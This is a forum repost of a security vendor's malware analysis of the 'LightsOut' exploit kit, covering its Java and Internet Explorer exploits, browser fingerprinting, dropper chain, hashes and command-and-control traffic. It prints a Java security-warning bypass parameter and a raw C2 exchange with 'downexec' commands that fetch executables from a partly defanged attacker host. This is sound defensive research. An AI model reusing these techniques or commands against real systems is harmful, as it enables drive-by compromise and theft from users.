Jump to content
Nytro

Continued analysis of the LightsOut Exploit Kit

Recommended Posts

Posted

[h=2][/h] Continued analysis of the LightsOut Exploit Kit

At the end of March, we disclosed the coverage of an Exploit Kit we called “Hello”: VRT: Hello, a new specifically covered exploit kit, or “LightsOut”, we thought we’d do a follow up post to tear this exploit kit apart a bit more. This variant of the LightsOut exploit kit uses a number of Java vulnerabilities, and targets multiple browsers. The primary goal is to drop & execute a downloader executable, which in turn downloads and executes more malware samples. These secondary malware samples are run in a sequence, and do some information harvesting, and potentially exfiltrate the information harvested. Overall, not fun for visitors to sites compromised with the LightsOut exploit kit.

Because of the number of Java vulnerabilities leveraged by this kit; it's important to keep Java updated, and make certain that outdated versions of Java aren't still sticking around on your PC. You can download a utility from Oracle to remove outdated versions of Java, referenced by this article: https://www.java.com/en/download/faq/uninstaller_toolinfo.xml. A detailed analysis on how the kit operates is below, under Browser Trajectory Analysis.

Java CVEs: CVE-2013-2465 - Incorrect image channel verification (buffered image) CVE-2012-1723 - Classloader vulnerablity

CVE-2013-2423 - Java Security Prompt / Warning bypass

Microsoft Internet Explorer CVEs:

CVE-2013-1347 - CGenericElement Object Use-After-Free Vulnerability

CVE-XXXX-XXXX - Pending verification of another heap spray leveraging a use-after-free

Browsers explicitly targeted: Chrome, Internet Explorer

Snort SIDs that should catch parts of this kit:

SIDs: 26569 through 26572, 26603 and 26668

First stage dropper:

C&C Server: 93.171.216.118

IP Address hosting malware: 93.188.161.235

Secondary dropped malware sample sha256 hashes:

  • 1218d79fca1aca48e13a5e6e582cdc5c4d24c3367328c56d61d975a757509335 fl.jpg
  • ac9294849559c94d5e85cb113ce8ca61bca2e576a97a9e81f66321496ddada61 tl.jpg
  • 5ee0761f5eda01985d5f93a5e50a1247fb5c17deba1d471b05fc09751d09a08e shot.jpg
  • a26f3225aa7e7b5263033dee682153fb7a4332429782c5755a9eaebe8a5df095 inf.jpg

JavaScript IDS evasion methods:

  • Sample encoded string (remove all digits) from JavaScript

"836f4974362o65679305r82637150N61617044a77736359m99323481e9388" becomes "forName"

[h=2]Browser Trajectory Analysis[/h] [h=3]Stage 1: dtsrc.php - detect installed fonts, direct to 1st stage of exploits via IFRAME[/h] The first stage leverages a holdover technique from the Internet Explorer 6 era – the HtmlDlgSafeHelper ActiveX control; to check if a list of over 700 fonts are available to the browser. This is entirely unrelated to any compromise method, but may be a method of "fingerprinting" the installed version and language packs of Windows + Internet Explorer, based on available fonts. The list of found fonts is concatenated together, MD5 hashed, and the hash is submitted to the malicious site.

[h=3]Stage 2: dtsrc.php?a=h1 - plugin detection javascript, direction to individual exploits based on browser + plugins[/h] dtsrc.php?a=h1 has JavaScript that detects the environment in the browser to determine which exploits to direct the browser to. The JavaScript is obfuscated and minified (placed all on one line -- use a beautifier utility, or something like http://jsbeautifier.org for an online version)

  • In-lines PluginDetect JS library from PluginDetect
  • Interesting: has unused/commented-out code for detecting Microsoft SharePoint plugins.

All of the exploits are called by dynamically appending an <IFRAME> tag to the document, pointing to one of the exploit URLs. This is the common IFRAME function leveraged by the dtsrc,php?a=h1 page.

1.png

Here’s the unused detection routine for SharePoint — this may be an incomplete attempt to exploit the MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free vulnerability.

2.png

[h=3]Browser compromise flow:[/h]

  • [h=4]IE 7 on XP ––> h5 exploit page, then:[/h]



    1. Java 6 update <= 32 = h7 exploit page
    2. OR
    3. Java 7 update <= 17 = h2 exploit page




3.png


4.png

  • [h=4]IE 8 on XP ––> h6 exploit page, then:[/h]



  1. Java 6 update <= 32 = h7 exploit page
  2. OR
  3. Java 7 update <= 17 = h2 exploit page




5.png

  • [h=4]IE 6 on XP ––> h4 exploit page, then:[/h]



  1. Java 6 update <= 32 = h7 exploit page
  2. OR
  3. Java 7 update <= 17 = h2 exploit page




6.png

  • [h=4]Chrome on Windows ––> Java 7 update <= 7 = h3 exploit page[/h]

7.png

  • [h=4]Any browser ––> Java 6 update <= 32 = h7 exploit page (see above screenshot)[/h]
  • OR Java 7 update <= 17 = h2 exploit page

[h=3]Stage 3: dtsrc.php?a={??} where {??} is one of the h2/h3 etc below[/h]

  • [h=4]h2 == Java 7 update <= 17 CVE-2013-2423[/h]


    • This uses a base64 encoded JNLP with applet parameter __applet_ssv_validated=true for the CVE-2013-2423 warning bypass
    • Loads the r2 JAR for downloading the dropper

8.png

And if we base64 decode the jnlp_embedded parameter, here’s the warning dialog bypas:

9.png

  • [h=4]h3 == Chrome w/ Java 7 update <= 17 CVE-2013-2423[/h]
    • Nearly exactly the same as h2 page, the JNLP is encoded/presented differently.
    • Uses deployJava.js from java.com; deployJava.runApplet(
    • Loads the r2 JAR for downloading the dropper

10.png

And it’s the exact same base64 encoded JNLP from H2.

  • [h=4]h4 & h5 == Microsoft Internet Explorer 6 and Windows XP[/h]
    • Heap Spray w/ DOM use-after-free vulnerability - we have ongoing research to determine exactly which CVE it is.

11.png

  • [h=4]h7 == Java 6 update <= 32[/h]
    • Direct <applet> loading of r7 JAR, which leverages the CVE-2012-1723 classloader confusion vulnerability

[h=3] Java JAR Analysis[/h]

  • [h=4]r2 jar - CVE-2013-2465[/h]
    • CVE-2013-2465 is the Incorrect image channel verification (buffered image) vulnerability, which permits execution of arbitrary code.
    • Java class grants itself full permissions via overloading java.security.AllPermission
    • Ultimately downloads to disk and executes an executable (ntsys391.exe).

This JAR has a pretty simple IDS evasion technique where it decodes the URL to download the executable at runtime, through simple XOR routine.

12.png

  • [h=4]r7 jar - CVE-2012-1723[/h]
    • This exploits the getClassLoader vulnerability - by modifying a class file by hand, you can confuse the Java runtime between a static variable and an instance variable. This results in code being executed outside of the java sandbox, when it hasn't been verified as safe.
    • A Java class grants itself full permissions via overloading java.security.AllPermission
    • One of the malicious classes in the JAR has another class embedded as a string that gets decoded and executed directly (r7-embedded.class, below)

  • [h=4]r7-embedded.class[/h]
    • This leverages java.security.PrivilegedExceptionAction
    • When successful, it downloads an executable from a hardcoded url to the Java temp dir, and saves the file as ntsys391.exe. The hard-coded URL is the same .php file as the rest of the exploit kit including the fully qualified domain name. This may mean the exploit kit is rebuilt for each compromised host, or the r7 jar is dynamically built for each request by PHP.

13.png

[h=3]Stage 4 - the dropped executable - which is a dropper as well[/h]

  • Either one of the Java vulnerabilities or the heap spray in Microsoft Internet Explorer requests dtsrc.php?a=dwe, which is saved to disk as ntsys391.exe
  • ntsys391.exe downloads additional executables, the .jpg URLs referenced below under “Network Indicators”

[h=3]Host Indicators[/h]

  • First stage dropper: - initially dropped as ntsys391.exe
    • SHA: D667833E4915C385321B553785732BBED3009C2A
    • SHA256: 164de09635532bb0a4fbe25ef3058b86dac332a03629fc91095a4c7841b559da

    [*]Copies/Renames self as C:\Documents and Settings\Administrator\Application Data\ Broker services\WbemMonitor .exe

    [*]Runs self: "WbemMonitor .exe -fst”

    [*]Phones home to C2 w/ a POST request (see “Network Indicators” below) to retrieve other executables to download.

    [*]Retrieves shot.jpg, which is actually an EXE -> C:\Documents and Settings\Administrator\Application Data\ Broker services\plugs\mmc.exe

    • SHA: 334eeaf5ea3920b612b4e26bbe3e0cccbc431c2e
    • SHA256: 5ee0761f5eda01985d5f93a5e50a1247fb5c17deba1d471b05fc09751d09a08e

[h=3]Network Indicators[/h]

  • Contacts
    • 93.171.216.118
    • Request: (Analyst Note: notice — no User-Agent header, HTTP/1.1 to a dotted quad)
      • POST /check_value.php HTTP/1.1
      • Content-Type: application/x-www-form-urlencoded
      • Host: 93.171.216.118
      • Content-Length: 42
      • Connection: Keep-Alive
      • Cache-Control: no-cache

      [*]Post Body:

      • identifiant=51032_2161380123730&version=2.
      • Response: (Analyst Note: broken apart for readability - this was originally all on one line - lines delimited by a ; character, and trivally defanged)
      • work:3|downexec hxxp://93.188.161[.]235/check2/muees27jxt/shot.jpg;
      • work:5|downexec hxxp://93.188.161[.]235/check2/muees27jxt/tl.jpg;
      • work:7|downexec hxxp://93.188.161[.]235/check2/muees27jxt/fl.jpg;
      • work:290|downexec hxxp://93.188.161[.]235/check2/muees27jxt/inf.jpg;


    • 93.188.161.235
    • Request (Analyst Note: this kit only returns the JPG if the user-agent matches the string below, HTTP/1.1 to a dotted quad)
      • GET /check2/muees27jxt/shot.jpg HTTP/1.1
      • User-Agent: User-Agent: Opera/10.35 Presto/2.2.30
      • Host: 93.188.161.235
      • Cache-Control: no-cache

      [*]Response:

      • PE executable

btn-fave2.png 16x16-digg-guy.png

Written by Richard Harman at 1:24 PM

Sursa: VRT: Continued analysis of the LightsOut Exploit Kit

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...